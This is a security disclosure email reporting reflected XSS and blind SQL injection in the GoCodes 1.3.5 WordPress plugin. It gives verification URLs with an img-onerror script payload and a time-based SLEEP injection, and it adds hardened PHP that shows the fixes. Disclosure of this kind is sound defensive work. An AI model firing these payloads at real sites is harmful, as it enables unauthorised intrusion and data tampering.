Subject: SQL injection and Cross-Site Scripting (XSS) in GoCodes 1.3.5
Date: Tue, 25 Aug 2015 14:46:49 +0200

Hello,

Plugin: GoCodes 1.3.5 https://wordpress.org/plugins/gocodes/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject HTML/JS code (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&deletegc=[xss]
Vulnerable parameter: deletegc

Example PHP callstack:
wsc_gocodes_managemenu   [/gocodes/menus.php:28]

Verification:
http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&deletegc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


2. Blind SQL injection

Authenticated users (like editors) can execute arbitrary SQL commands (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&gcresetcountconf=yes&gcid=1
Vulnerable parameter: gcid

Example PHP callstack:
wsc_gocodes_managemenu   [/gocodes/menus.php:79]
fake_wpdb::query

Verification:
http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&gcresetcountconf=yes&gcid=1%20OR%20(SELECT%20*%20FROM(SELECT%20SLEEP(5))XXX)

There are similar SQL injections with the same parameter:
/gocodes/menus.php:63
/gocodes/menus.php:158
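For reference, this is how the two affected branches of the admin handler could be hardened: a nonce check against the missing CSRF protection, output escaping for deletegc, and an integer cast plus $wpdb->prepare() for gcid. This is an added illustration, not the plugin's code; the table name, column names and nonce action names are assumptions.

```php
<?php
// Added illustration (not GoCodes' own code). Table/column names are assumed.
function wsc_gocodes_managemenu_hardened() {
    global $wpdb;
    $table = $wpdb->prefix . 'gocodes'; // assumed table name

    // Only privileged users may run these admin actions at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // deletegc: verify a nonce so the request cannot be forged cross-site,
    // and escape the value before echoing it back (fixes the reflected XSS).
    if ( isset( $_GET['deletegc'] ) ) {
        check_admin_referer( 'gocodes_delete', '_gcnonce' ); // dies on a bad or missing nonce
        $code = sanitize_text_field( wp_unslash( $_GET['deletegc'] ) );
        // $wpdb->delete() binds the value itself; 'gccode' is an assumed column.
        $wpdb->delete( $table, array( 'gccode' => $code ), array( '%s' ) );
        echo '<div class="updated"><p>Deleted: ' . esc_html( $code ) . '</p></div>';
    }

    // gcid: nonce check, cast to int, and bind with $wpdb->prepare() instead of
    // concatenating the raw parameter into the query (fixes the blind SQLi).
    if ( isset( $_GET['gcresetcountconf'], $_GET['gcid'] ) && 'yes' === $_GET['gcresetcountconf'] ) {
        check_admin_referer( 'gocodes_reset', '_gcnonce' );
        $gcid = absint( $_GET['gcid'] ); // "1 OR (SELECT ...)" is reduced to 1
        if ( $gcid > 0 ) {
            // 'gccount' and 'gcid' are assumed column names.
            $wpdb->query( $wpdb->prepare( "UPDATE {$table} SET gccount = 0 WHERE gcid = %d", $gcid ) );
        }
    }
}

// The links that trigger these actions must carry the matching nonce, e.g.:
// wp_nonce_url( admin_url( 'tools.php?page=gocodes/gocodes.php&gcresetcountconf=yes&gcid=1' ),
//               'gocodes_reset', '_gcnonce' );
```

The same prepare()/absint() treatment applies to the other two gcid queries at menus.php:63 and menus.php:158.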

--
Regards,
Marcin Probola,